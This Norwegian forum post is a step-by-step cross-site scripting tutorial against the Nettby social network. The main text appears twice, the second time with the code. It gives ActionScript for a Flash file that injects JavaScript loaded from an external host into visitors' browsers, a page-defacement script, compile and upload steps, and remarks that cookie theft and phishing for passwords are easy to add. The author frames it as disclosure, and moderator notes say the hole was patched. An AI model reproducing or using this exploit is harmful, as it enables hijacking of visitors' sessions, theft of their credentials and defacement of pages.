[COLOR=Red]Dyret er lei av PMer om dette emnet, og vil minne om at det faktisk ikkje fungerer lenger. Dyret ber derfor om at folk leser tråden, dette, tenker, finner ut at det ikkje funer, istadenfor å sende PM.[/COLOR]
Siden det å prøve å komme gjennom til Nettby-ledelsen med dette har vist seg umulig, ser jeg meg nødt til å dele dette med alle - i håp om at noe blir gjort før de krimineller tar over.
De som bruker Nettby har sikkert fått med seg at det er mulig å "pimpe" profilen din ved å legge til en kryptisk flash-fil generert av http://pimp.thurmann.net. Denne flash-filen inkluderer rett og slett JavaScriptkode, som igjen inkluderer en ekstern fil med enda mer kode. Resultatet er at HTML-koden blir endret når personer besøker profilen din, uten at den som besøker trykker på noe som helst.
Dette er en av de snille mulighetene.
Med tilgang til å legge inn egen JavaScript-kode kan en med profil på Nettby f.eks. redirekte personer til en annen side, fikse på innholdet slik at brukeren tror han eller hun er utlogget (og snappe passordet når de "logger på igjen"), stjele cookies, og alt dette uten at brukeren skjønner noe som helst. Altså et relativt stort sikkerhetshull.
Men til hovedsaken, hvordan kan DU gjøre dette? Du trenger følgende:
- Motion-Twin Compiler (Command-line verktøy for å kompilere ActionScript)
- Et domene med et par kilobyte lagringsplass
- Minimal forståelse av enten JavaScript & HTML, innen bruk av Google, eller copy-pasting av tråder.
Pakk ut Motion-Twin og opprett en fil kalt f.eks. xss.as i samme mappe, som ser slik ut:
Fjern mellomrom der du ser at de er generert feil pga code-boksen, dvs. i "(' head')", "js.setA ttribute" og "(js )".
[COLOR=Red]Nettby har tetta hullet. Ikkje send PM til dyret om det.[/COLOR]
Bytt ut URL'en helt til slutt med din egen, og kompiler med
mtasc -swf xss.swf -main xss.as -header 1:1:30
Trikset her er at getURL blir skrevet direkte i klientens adressefelt, så der kan du skrive hva enn du vil - det seg være en ren redirect til en annen URL, eller javascript:alert('BAM!'); Prøv å unngå å bruke anførselstegn i koden, siden escaping med nøstede kommandoer slik ikke alltid kompilerer riktig.
I filen xss.js kan du skrive omtrent hva som helst av JavaScript-kode, og er lettere å gjøre raske endringer på enn å hardkode dem inn i en flash-fil hver eneste gang. Et eksempel på en slik scriptfil har jeg inkludert under, og den legger inn din egen html oppå den gamle for å gi et nytt utseende (også kalt defacing).
[COLOR=Red]Nettby har tetta hullet. Ikkje send PM til dyret om det.[/COLOR]
Koden inkluderer en del style-tags bare for å vise hvordan det faktisk kan gjøres. For de som føler seg litt ondere, er en cookie-stealer temmelig lett å implementere her også. Dette er bare én av uendelig mange muligheter, så det føler jeg ikke er nødvendig å dekke her.
Etter du har gjort dette gjenstår det et par trinn:
1. Last opp xss.js og xss.swf til et domene du har tilgang til, fortrinnsvis til samme URL som i xss.as
2. Gå til Nettby.
3. Trykk på "Endre profil" i menyen til høyre.
4. Trykk på knappen helt øverst til høyre i verktøy-boksen du har (Insert / edit embedded media).
5. Velg Type = Flash og Dimensions = 1x1 FØRST.
6. Skriv inn full URL til xss.swf og trykk "Sett inn" uten å trykke på noen andre felt.
Boksen vil prøve å forhåndsvise, og dermed kjøre koden din hvis du trykker på et annet felt. Dette ønsker du ikke, så vent med å taste URL helt til slutt.
Når noen nå besøker profilen din vil de se f.eks. noe sånt som dette:
https://imma.gr/2564
Til slutt vil jeg si at dette er NØYAKTIG samme konsept som "Pimp My Profile" bruker, og så lenge dét har lov å endre html-kode og utseende vil jeg hevde at alle har lov å gjøre det. Jeg oppfordrer ikke til bruk av ondsinnet kode, men det er ikke til å stikke under en stol at det er veldig mulig å utføre for de som kan.
[COLOR=Red]Nettby har tetta hullet. Ikkje send PM til dyret om det.[/COLOR]
Siden det å prøve å komme gjennom til Nettby-ledelsen med dette har vist seg umulig, ser jeg meg nødt til å dele dette med alle - i håp om at noe blir gjort før de krimineller tar over.
De som bruker Nettby har sikkert fått med seg at det er mulig å "pimpe" profilen din ved å legge til en kryptisk flash-fil generert av http://pimp.thurmann.net. Denne flash-filen inkluderer rett og slett JavaScriptkode, som igjen inkluderer en ekstern fil med enda mer kode. Resultatet er at HTML-koden blir endret når personer besøker profilen din, uten at den som besøker trykker på noe som helst.
Dette er en av de snille mulighetene.
Med tilgang til å legge inn egen JavaScript-kode kan en med profil på Nettby f.eks. redirekte personer til en annen side, fikse på innholdet slik at brukeren tror han eller hun er utlogget (og snappe passordet når de "logger på igjen"), stjele cookies, og alt dette uten at brukeren skjønner noe som helst. Altså et relativt stort sikkerhetshull.
Men til hovedsaken, hvordan kan DU gjøre dette? Du trenger følgende:
- Motion-Twin Compiler (Command-line verktøy for å kompilere ActionScript)
- Et domene med et par kilobyte lagringsplass
- Minimal forståelse av enten JavaScript & HTML, innen bruk av Google, eller copy-pasting av tråder.
Pakk ut Motion-Twin og opprett en fil kalt f.eks. xss.as i samme mappe, som ser slik ut:
Fjern mellomrom der du ser at de er generert feil pga code-boksen, dvs. i "(' head')", "js.setA ttribute" og "(js )".
[COLOR=Red]Nettby har tetta hullet. Ikkje send PM til dyret om det.[/COLOR]
Kode
class Xss {
static var app : Xss;
function Xss() {
}
static function main(mc) {
getURL("javascript:function include_dom(script_filename){var html_doc=document.getElementsByTagName('head').item(0);var js = document.createElement('script');js.setAttribute('language', 'javascript');js.setAttribute('type', 'text/javascript');js.setAttribute('src', script_filename);html_doc.appendChild(js);} include_dom('http://path/to/external/xss.js');");
}
}
mtasc -swf xss.swf -main xss.as -header 1:1:30
Trikset her er at getURL blir skrevet direkte i klientens adressefelt, så der kan du skrive hva enn du vil - det seg være en ren redirect til en annen URL, eller javascript:alert('BAM!'); Prøv å unngå å bruke anførselstegn i koden, siden escaping med nøstede kommandoer slik ikke alltid kompilerer riktig.
I filen xss.js kan du skrive omtrent hva som helst av JavaScript-kode, og er lettere å gjøre raske endringer på enn å hardkode dem inn i en flash-fil hver eneste gang. Et eksempel på en slik scriptfil har jeg inkludert under, og den legger inn din egen html oppå den gamle for å gi et nytt utseende (også kalt defacing).
[COLOR=Red]Nettby har tetta hullet. Ikkje send PM til dyret om det.[/COLOR]
Kode
var title = "NETTBY ER IKKE SIKKERT!";
var bgcolor = "#000000";
var image_url = "http://www.localarcade.com/arcade_art/data/thumbnails/9/Homer_Simpson_Sideart_Homebrew.jpg";
var text = "Nå kunne jeg ha sittet med din sensitive informasjon, eller lurt deg til å logge inn på nytt og tatt passordet ditt. Hjelp til med å varsle byvakter og si at flash-innhold må forbys i profiler!";
var font_color = "#FF0000";
deface(title, bgcolor, image_url, text, font_color);
function deface(pageTitle, bgColor, imageUrl, pageText, fontColor) {
document.title = pageTitle;
document.body.innerHTML = '';
document.bgColor = bgColor;
var overLay = document.createElement("div");
overLay.style.textAlign = 'center';
document.body.appendChild(overLay);
var txt = document.createElement("p");
txt.style.font = 'normal normal bold 36px Verdana';
txt.style.color = fontColor;
txt.innerHTML = pageText;
overLay.appendChild(txt);
if (image_url != "") {
var newImg = document.createElement("img");
newImg.setAttribute("border", '0');
newImg.setAttribute("src", imageUrl);
overLay.appendChild(newImg);
}
var footer = document.createElement("p");
footer.style.font = 'italic normal normal 12px Arial';
footer.style.color = '#DDDDDD';
footer.innerHTML = title;
overLay.appendChild(footer);
}
Etter du har gjort dette gjenstår det et par trinn:
1. Last opp xss.js og xss.swf til et domene du har tilgang til, fortrinnsvis til samme URL som i xss.as
2. Gå til Nettby.
3. Trykk på "Endre profil" i menyen til høyre.
4. Trykk på knappen helt øverst til høyre i verktøy-boksen du har (Insert / edit embedded media).
5. Velg Type = Flash og Dimensions = 1x1 FØRST.
6. Skriv inn full URL til xss.swf og trykk "Sett inn" uten å trykke på noen andre felt.
Boksen vil prøve å forhåndsvise, og dermed kjøre koden din hvis du trykker på et annet felt. Dette ønsker du ikke, så vent med å taste URL helt til slutt.
Når noen nå besøker profilen din vil de se f.eks. noe sånt som dette:
https://imma.gr/2564
Til slutt vil jeg si at dette er NØYAKTIG samme konsept som "Pimp My Profile" bruker, og så lenge dét har lov å endre html-kode og utseende vil jeg hevde at alle har lov å gjøre det. Jeg oppfordrer ikke til bruk av ondsinnet kode, men det er ikke til å stikke under en stol at det er veldig mulig å utføre for de som kan.
[COLOR=Red]Nettby har tetta hullet. Ikkje send PM til dyret om det.[/COLOR]
Sist endret av vidarlo; 31. august 2008 kl. 00:16.
Prove me wrong, VG!
Til deg ?
